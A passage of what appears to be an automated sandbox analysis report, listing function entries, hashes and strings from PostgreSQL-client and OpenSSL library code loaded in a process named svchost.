                                                                                            • Instruction Fuzzy Hash: 1B41ACB2714B5582EB008B92EC5079ABBA5FB89B98F848539DE4D07354EF3EC654C740
                                                                                            APIs
                                                                                            • OBJ_nid2sn.LIBCRYPTO-3-X64 ref: 00007FFDA36E86B5
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$J_nid2snlibintl_dgettext
                                                                                            • String ID: could not determine server certificate signature algorithm$could not find digest for NID %s$could not generate peer certificate hash$out of memory
                                                                                            • API String ID: 1616563658-1739726057
                                                                                            • Opcode ID: 7456befcdb49f6cfc16e68dfb7b58b7fb4c2e1dfacd58c0b981bdf03a27fead2
                                                                                            • Instruction ID: 36b4ed74a730ec657a40d2fbd2fbcd278c87ca7a911360b6587f53d23dc84f6b
                                                                                            • Opcode Fuzzy Hash: 7456befcdb49f6cfc16e68dfb7b58b7fb4c2e1dfacd58c0b981bdf03a27fead2
                                                                                            • Instruction Fuzzy Hash: 7C319221B1F74645FA549B21A5356BD2393EF48BC0F6C2431E94E63787EF2EE4089708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$_time64libintl_dgettextselect
                                                                                            • String ID: %s() failed: %s$invalid socket$select
                                                                                            • API String ID: 577054053-2869021068
                                                                                            • Opcode ID: 9b298d906029ec9bae901bf1c7d5cf59c18c3c0e3a39881f4c9bdde784c764ab
                                                                                            • Instruction ID: ec83ff743eefde37a0f9da72ddb2462bae98209ddda42ee140d9a9cc8a53b905
                                                                                            • Opcode Fuzzy Hash: 9b298d906029ec9bae901bf1c7d5cf59c18c3c0e3a39881f4c9bdde784c764ab
                                                                                            • Instruction Fuzzy Hash: 3931A231B0EA8281F6609B14F4643A97393FB44744F182236DA4D567DADF3EE0498B48
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno$_time64libintl_dgettextselect
                                                                                            • String ID: %s() failed: %s$invalid socket$select
                                                                                            • API String ID: 577054053-2869021068
                                                                                            • Opcode ID: a21542403bc37c5dc81cdea3681561941a922bc36d663b50e13076fd009d6bda
                                                                                            • Instruction ID: 556197ef285483c9fefe59f217553478f9543c029d78f6dd41e8d01ea2b7dbaf
                                                                                            • Opcode Fuzzy Hash: a21542403bc37c5dc81cdea3681561941a922bc36d663b50e13076fd009d6bda
                                                                                            • Instruction Fuzzy Hash: 7B319672B0EA8281F6609F14F4503AA73A2FB84754F582236DA5D537D5DF3EE009CB48
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ %d$ \x%02x$CopyInResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-2526997389
                                                                                            • Opcode ID: 90a3719b308e9b7e15fc5213c2bbbd157c4c6f0ba9d94ab6eed9b297f5b708d1
                                                                                            • Instruction ID: 99ace7eacfe120f1e87fcba41850a3b6ab4996cdbf47a2945b05f94c64fba6f9
                                                                                            • Opcode Fuzzy Hash: 90a3719b308e9b7e15fc5213c2bbbd157c4c6f0ba9d94ab6eed9b297f5b708d1
                                                                                            • Instruction Fuzzy Hash: F621B0A2B1A29642FA50DB11E4617B96363EF407C8F487131DE4E17346CE7EE089D348
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: %c$ %d$ \x%02x$CopyBothResponse$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-986030531
                                                                                            • Opcode ID: 754273cd4aecad12dba0605fc873723a2fa4bb1b1eb6a4fe308a861c23a4436c
                                                                                            • Instruction ID: e362c12cc2373c6617d7d536e636c276c9fa4d6e4da7d298b1f7160d61576158
                                                                                            • Opcode Fuzzy Hash: 754273cd4aecad12dba0605fc873723a2fa4bb1b1eb6a4fe308a861c23a4436c
                                                                                            • Instruction Fuzzy Hash: 5D1181A2B0B65642FA10DB15E5A07B92363EB407C8F487132EA0E17747CE6FE589D348
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdup$free$mallocmemset
                                                                                            • String ID:
                                                                                            • API String ID: 957745791-3916222277
                                                                                            • Opcode ID: 9dbf3abd0d8cde1d1f407bc76f14bd60e431657779e787709216d862b4f90330
                                                                                            • Instruction ID: 586982cb9e1ca753de104e2f72bab398e939be45a7cd1d239a4fa6f1d7faa45a
                                                                                            • Opcode Fuzzy Hash: 9dbf3abd0d8cde1d1f407bc76f14bd60e431657779e787709216d862b4f90330
                                                                                            • Instruction Fuzzy Hash: 0D119D22B0AB4285FB448B26E86013927A1EF8ABD4F1C5034DA4D177AADF3ED451C344
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_test_flags$O_get_retry_reasonR_peek_error
                                                                                            • String ID:
                                                                                            • API String ID: 265086535-0
                                                                                            • Opcode ID: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                            • Instruction ID: ff02a006d90b706dbb777c49468d0371963b82930af9f21504af7d7736bc73e1
                                                                                            • Opcode Fuzzy Hash: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                            • Instruction Fuzzy Hash: 00916431F1E14282FBA4C616A16063D6392EF54B84F5C2431EA5EE77CBDE1EF8918709
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d046c1c88af8d9e5ba20d86e38cde6b35e4ef66c6f08dbd0028acdc3ba97a755
                                                                                            • Instruction ID: 6c8db76bd2f623d1bcee4d155f9c80275816e542e977fac6b8bbd9d94b7011ba
                                                                                            • Opcode Fuzzy Hash: d046c1c88af8d9e5ba20d86e38cde6b35e4ef66c6f08dbd0028acdc3ba97a755
                                                                                            • Instruction Fuzzy Hash: D541FFBAA1C258AAE712CBD9845430DFFA0E75639DF825232DE49073B0C3B99D85C342
                                                                                            APIs
                                                                                            Strings
                                                                                            • host name must be specified for a verified SSL connection, xrefs: 00007FFDA36E7D47
                                                                                            • server certificate for "%s" does not match host name "%s", xrefs: 00007FFDA36E7D0D
                                                                                            • server certificate for "%s" (and %d other names) does not match host name "%s", xrefs: 00007FFDA36E7CB9
                                                                                            • verify-full, xrefs: 00007FFDA36E7C5A
                                                                                            • could not get server's host name from server certificate, xrefs: 00007FFDA36E7D1E
                                                                                            • server certificate for "%s" (and %d other name) does not match host name "%s", xrefs: 00007FFDA36E7CC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: freestrcmp
                                                                                            • String ID: could not get server's host name from server certificate$host name must be specified for a verified SSL connection$server certificate for "%s" (and %d other name) does not match host name "%s"$server certificate for "%s" (and %d other names) does not match host name "%s"$server certificate for "%s" does not match host name "%s"$verify-full
                                                                                            • API String ID: 716601943-901380075
                                                                                            • Opcode ID: 918ac9fc1edbc93873064dd82ede4a1d745ab88758a7eca3a772d1e55788ede2
                                                                                            • Instruction ID: b766c9f84849096947d27d825f7ebc4bbb279f6bed765248feb8cfebae9c580b
                                                                                            • Opcode Fuzzy Hash: 918ac9fc1edbc93873064dd82ede4a1d745ab88758a7eca3a772d1e55788ede2
                                                                                            • Instruction Fuzzy Hash: 4131A562B0EB8281FA009B54F4601F96353FB81B90F582032DE4C577A6EF6EE54AC708
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 40bd6e3ffdfc467a47020ff6a39197a30c6ad2303263d1b40b6ec10154ede92b
                                                                                            • Instruction ID: 25eb82fa1aed4a7da0b663f1c47c167281676b75f642cfc2a578c837e9e3e13f
                                                                                            • Opcode Fuzzy Hash: 40bd6e3ffdfc467a47020ff6a39197a30c6ad2303263d1b40b6ec10154ede92b
                                                                                            • Instruction Fuzzy Hash: 0001E926B16B86C2FB049FAAE8641392322FB88F55B0C1471CD0E5A335CE3DD889C344
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno
                                                                                            • String ID: /%u
                                                                                            • API String ID: 2918714741-80514459
                                                                                            • Opcode ID: 0ba1e89c34fc0a67c9f69d9ebe87c96b48d6db8db5620828719671632995fa63
                                                                                            • Instruction ID: a10f1ae769087049362044155f94c16daeb5f218029436ff407dc1b92f05c464
                                                                                            • Opcode Fuzzy Hash: 0ba1e89c34fc0a67c9f69d9ebe87c96b48d6db8db5620828719671632995fa63
                                                                                            • Instruction Fuzzy Hash: 7D023522F1F2928AF7659A24946177D37E2BB41784F0C6236CE4E63B86CE7EDC448744
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000001,?,00000000,-00000004,00000001,00000000,00000000,00007FFDA36ED09A), ref: 00007FFDA36F0DD5
                                                                                            • bsearch.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0E95
                                                                                            • bsearch.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0ED0
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0F3D
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0F53
                                                                                            • bsearch.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F0FCE
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00007FFDA36D1029), ref: 00007FFDA36F1116
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: bsearch$freemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4280696285-0
                                                                                            • Opcode ID: 84dd3428b0e4b449e53855de4397a7857324600eb58f57ac88812422c024c5c8
                                                                                            • Instruction ID: 25b96b9f49d65c262ec8f93c0a9336f89ca38ef261e9ecd0cf3d2c9dd361af35
                                                                                            • Opcode Fuzzy Hash: 84dd3428b0e4b449e53855de4397a7857324600eb58f57ac88812422c024c5c8
                                                                                            • Instruction Fuzzy Hash: 66A18F72B0B68686FB208F15E4603A97BA2FB46B88F485035CE4D57796DF3EE445C704
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_ctrl$R_newR_set_debugmemcpy
                                                                                            • String ID: dtls1_retransmit_message$ssl\statem\statem_dtls.c
                                                                                            • API String ID: 4082158838-3994044773
                                                                                            • Opcode ID: c9f9dc1b691a6b18460340668137af319db6df49a5d2aa727dd1b189ac01c4a4
                                                                                            • Instruction ID: d2113900aa2198d45010acdb1d952407f6cdfc9dad9776576496744ff7c95566
                                                                                            • Opcode Fuzzy Hash: c9f9dc1b691a6b18460340668137af319db6df49a5d2aa727dd1b189ac01c4a4
                                                                                            • Instruction Fuzzy Hash: C151993220AB80C6E760DF22E890AE933A5FB88B88F485536EF8C57756DF39D541C704
                                                                                            APIs
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D5656
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D57D6
                                                                                              • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA942
                                                                                              • Part of subcall function 00007FFDA36DA920: strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFDA36DA956
                                                                                              • Part of subcall function 00007FFDA36DA920: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36DA965
                                                                                              • Part of subcall function 00007FFDA36DA920: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36DA983
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freeisspacemallocstrtol
                                                                                            • String ID: keepalives$keepalives_count$keepalives_idle$keepalives_interval$tcp_user_timeout
                                                                                            • API String ID: 63552027-1152912899
                                                                                            • Opcode ID: 875355ba180783afabd4a6196db407fdff0ee322ac2a27bff548f19ff2c99ec1
                                                                                            • Instruction ID: cffa2ed979224b7fe31daaf30862d8efb7e929fd6c8ca312a73f444469f797f9
                                                                                            • Opcode Fuzzy Hash: 875355ba180783afabd4a6196db407fdff0ee322ac2a27bff548f19ff2c99ec1
                                                                                            • Instruction Fuzzy Hash: CD516D26A0AB8182FA55CF28C5143E82361FF85BA4F1CA331DF6C27797DF39A5958314
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$freelibintl_dgettextmallocmemcpystrchr
                                                                                            • String ID: SSL certificate's name contains embedded null$host name must be specified$out of memory
                                                                                            • API String ID: 2838870048-2356389534
                                                                                            • Opcode ID: f8446b34112ac1ad8bcd576494ba1a3eb4ecc207a5f52c03c371f3954c2f2266
                                                                                            • Instruction ID: fbfed57a9cabd61db4043c0725cbd585af258dd8fff07e99c862c240d829bb68
                                                                                            • Opcode Fuzzy Hash: f8446b34112ac1ad8bcd576494ba1a3eb4ecc207a5f52c03c371f3954c2f2266
                                                                                            • Instruction Fuzzy Hash: 0141B221B0EB4241FA219F59A4201F87792BF05BA0F6C2631DA5C277D6DF7EE659C304
                                                                                            APIs
                                                                                            • strstr.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F5FF0
                                                                                            • strstr.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F6013
                                                                                            • memcpy.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F60BB
                                                                                            • memcpy.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F60CA
                                                                                            • memcpy.VCRUNTIME140(?,disable,00000000,00007FFDA36F5F6D,?,?,00000000,00007FFDA36F4A43,require,?,?,00007FFDA36D7C74), ref: 00007FFDA36F60E2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$strstr
                                                                                            • String ID: disable$require
                                                                                            • API String ID: 3434740875-4247959637
                                                                                            • Opcode ID: 8cf88959986718156906a1f41982db4781af94d4a21a5be8503427c14f86c484
                                                                                            • Instruction ID: 9835dd93f5e719643c67a3323c52fe68473259e70f35b7f62ac45a3994854d5f
                                                                                            • Opcode Fuzzy Hash: 8cf88959986718156906a1f41982db4781af94d4a21a5be8503427c14f86c484
                                                                                            • Instruction Fuzzy Hash: C8312622B0BB8186FB55CB1596202B9A762FB15BC0F1C6539DE4E2374ADF3EE041C304
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$malloc
